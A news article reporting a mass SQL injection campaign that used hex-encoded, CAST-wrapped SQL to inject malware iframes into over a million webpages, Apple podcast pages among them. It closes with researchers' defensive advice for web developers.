A new series of mass SQL injection attacks has planted links to malware sites and hidden iframes in over a million webpages, including parts of Apple's website. The technique is similar to a standard SQL injection attack, but uses obfuscation to disguise the data in hopes of routing around any rudimentary input checking.

The attack was detailed earlier this week by security researcher Manuel Humberto Santander Peláez. The attacks rely on a series of SQL commands stored as hexadecimal data preceded by a CAST command. When decoded, it attempts to inject iframes into data tables, which then end up being rendered in webpages that use the tables to build its HTML code dynamically. The attacks lead to Russian top-level domains that appear to be sources of malware.

While the attacks have affected mostly smaller sites that tend to invest less time in securing against attacks like SQL injection, The Register notes that even some Apple podcast pages succumbed to the attack. However, the links appear to have been removed since the attacks first started spreading earlier this month. Other pages affected include sites for a Pennsylvania county government, a UAE radio station, and a small book publisher.

"These attacks have been ongoing and are changing pretty often," Mary Landesman, a senior researcher with ScanSafe, told The Register. "It's not clear whether these are the work of the same attackers or are competing attacks."

Peláez notes the SQL injection is something every site should be protecting against. Web developers should sanitize input to make sure there are no valid SQL commands, use predetermined STORE functions to make dynamic attacks useless, limit database permissions, and avoid disclosing database errors that attackers could use to find other weaknesses.